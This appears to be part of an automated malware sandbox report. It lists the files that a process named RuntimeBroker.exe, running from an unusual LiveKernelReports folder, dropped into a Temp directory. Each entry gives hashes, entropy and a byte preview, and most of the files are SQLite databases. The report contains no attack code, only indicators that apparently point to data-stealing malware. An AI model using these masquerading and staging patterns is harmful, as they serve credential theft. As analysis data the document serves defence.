                                                                                  Category:dropped
                                                                                  Size (bytes):847
                                                                                  Entropy (8bit):5.354334472896228
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                  C:\Users\user\AppData\Local\Temp\0KfApHTuYW

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\0U9a9iwxrv

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\0bAGSaIloU

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\0ghzjj6GmM

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\0kpuNgfS4z

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\1oawJcVF7x

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\23sJwa6T3x

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\24JxkFHPzd

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\26RHt739mu

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\2W7puGAK7p

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\2xjfsQZ2Oh

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\3GRraazEPs

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\3S1iVKk3Oq

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6732424250451717
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\3VvF1wiVEd

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.5707520969659783
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\3ZAJpvIZox

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\3hDm9jrtsr

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\47d7fhW6Su

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.8508558324143882
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\4C8vlfUZLp

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\4n1B3EoqiD

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.8553638852307782
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\4vX6yEeh4Q

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):51200
                                                                                  Entropy (8bit):0.8745947603342119
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                  MD5:378391FDB591852E472D99DC4BF837DA
                                                                                  SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                  SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                  SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\53ceS1JO51

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                  Category:dropped
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1239949490932863
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\56U6BA5wyk

                                                                                  Download File
                                                                                  Process:C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                  Category:dropped
                                                                                  Size (bytes):106496
                                                                                  Entropy (8bit):1.136471148832945
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                  Malicious:false
